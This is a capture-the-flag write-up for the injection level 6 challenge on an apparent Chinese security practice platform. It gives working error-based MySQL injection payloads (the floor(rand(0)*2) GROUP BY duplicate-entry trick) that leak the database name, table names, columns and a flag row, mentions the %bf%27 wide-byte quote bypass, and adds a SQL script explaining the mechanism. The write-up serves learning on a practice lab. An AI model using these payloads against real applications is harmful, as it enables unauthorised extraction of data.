Network Information Security Offense and Defense Learning Platform_Injection (Level 6)_Writeup

Challenge URL: http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin

Appending a single quote to username immediately produces a visible SQL error (I only noticed this while writing this post; when I actually did the challenge I kept using %bf%27, the GBK wide-byte trick for getting past an escaped quote). Once the error is echoed back, the rest is easy. (For background on error-based injection, first read the two linked references, then try a few small experiments.)

First, ?username=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 dumps the current database name, though that doesn't seem very useful here. (%23 is the URL-encoded #, which comments out the rest of the original query; 0x7e is ~, used as a marker on either side of the extracted value so it is easy to pick out of the error text.)

With ?username=admin'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 we can list the tables in this database; change the offset of the inner LIMIT 0,1 (the number marked in red in the original) to step through them one at a time. There are three tables: log, motto, and user.

Then use ?username=admin'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x6d6f74746f LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23. The first highlighted part is the hex encoding of the name of the table whose columns you want (0x6d6f74746f is 'motto'; hex avoids needing quotes inside the payload); change the second number (the LIMIT offset) to dump every column. Now it's time to grab the flag.

?username=admin' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,username,0x7e,id,0x7e,motto,0x7e) FROM motto limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 returns Duplicate entry '~#adf#ad@@#~100000~key#notfound!#~1' for key 'group_key'.
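The four payloads above are all the same error-based primitive with a different subquery spliced in. The following MySQL script, added here and not part of the original writeup, runs that primitive directly in a MySQL client so the mechanism (why floor(rand(0)*2) plus GROUP BY throws a Duplicate entry error that leaks the concatenated value) can be seen without the challenge page. The table motto and its columns username, id and motto are taken from the challenge; on any other database they are hypothetical names and must be replaced.

```sql
-- Added example, not code from the original writeup or the platform.
-- Requires a MySQL client; the queries on information_schema work on any
-- database, the ones on the hypothetical table `motto` only on the challenge DB.

-- 1. rand(0) is seeded, so floor(rand(0)*2) is the fixed sequence
--    0,1,1,0,1,1,... It is evaluated once per row of the driving table.
SELECT floor(rand(0)*2) AS x
FROM information_schema.tables
LIMIT 6;

-- 2. GROUP BY on an expression containing that value. MySQL computes the key
--    for a row, looks it up in the temporary grouping table, and if it is
--    absent it recomputes the expression when inserting. Because rand()
--    moves on between the lookup and the insert, the key written can collide
--    with one already stored, and the temp table's unique index on the group
--    key raises ERROR 1062: Duplicate entry '...' for key 'group_key'.
--    Whatever else is concatenated into the key is echoed in that error.
--    At least three driving rows are needed for the 0,1,1 collision;
--    information_schema.tables always has far more.
SELECT count(*), concat(0x7e, database(), 0x7e, floor(rand(0)*2)) AS x
FROM information_schema.tables
GROUP BY x;

-- 3a. Same primitive, subquery swapped for the table list of the current
--     database. Walk the list by changing the LIMIT offset: 0,1 then 1,1 ...
SELECT count(*), concat(0x7e,
  (SELECT table_name FROM information_schema.tables
   WHERE table_schema = database() LIMIT 0,1),
  0x7e, floor(rand(0)*2)) AS x
FROM information_schema.tables
GROUP BY x;

-- 3b. Columns of motto. 0x6d6f74746f is 'motto' in hex, so no quotes are
--     needed inside the payload. Filtering on table_schema as well avoids
--     picking up a same-named table from another schema, which the writeup's
--     payload does not do.
SELECT count(*), concat(0x7e,
  (SELECT column_name FROM information_schema.columns
   WHERE table_name = 0x6d6f74746f AND table_schema = database() LIMIT 0,1),
  0x7e, floor(rand(0)*2)) AS x
FROM information_schema.tables
GROUP BY x;

-- 3c. Rows of motto (hypothetical outside the challenge). The fourth row
--     (offset 3) is the one that held the flag in the writeup. The value
--     echoed in a Duplicate entry error is truncated after 64 characters in
--     common MySQL versions, so page through long rows with substring().
SELECT count(*), concat(0x7e,
  (SELECT concat(username, 0x7e, id, 0x7e, motto) FROM motto LIMIT 3,1),
  0x7e, floor(rand(0)*2)) AS x
FROM information_schema.tables
GROUP BY x;

-- 4. Wrapped the way the page's payloads do it, so it can be ANDed onto
--    the application's own WHERE clause: the outer SELECT 1 never returns
--    because the derived table `a` errors first.
--    username = admin' and (select 1 from ( <query 3c> ) a)#
SELECT 1 FROM (
  SELECT count(*), concat(0x7e,
    (SELECT concat(username, 0x7e, id, 0x7e, motto) FROM motto LIMIT 3,1),
    0x7e, floor(rand(0)*2)) AS x
  FROM information_schema.tables
  GROUP BY x
) a;
```

Each statement from step 2 onward is expected to fail with a Duplicate entry error; that failure is the output channel. If a statement instead returns a result set, the group key happened not to collide on that run, and re-running it or using a larger driving table restores the collision.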

Key obtained.


Side note: I kept submitting the level 6 answer to level 5, and on top of that the flag is notfound! (I thought I had found the wrong thing)...... I went through those three tables three full times! Aaargh.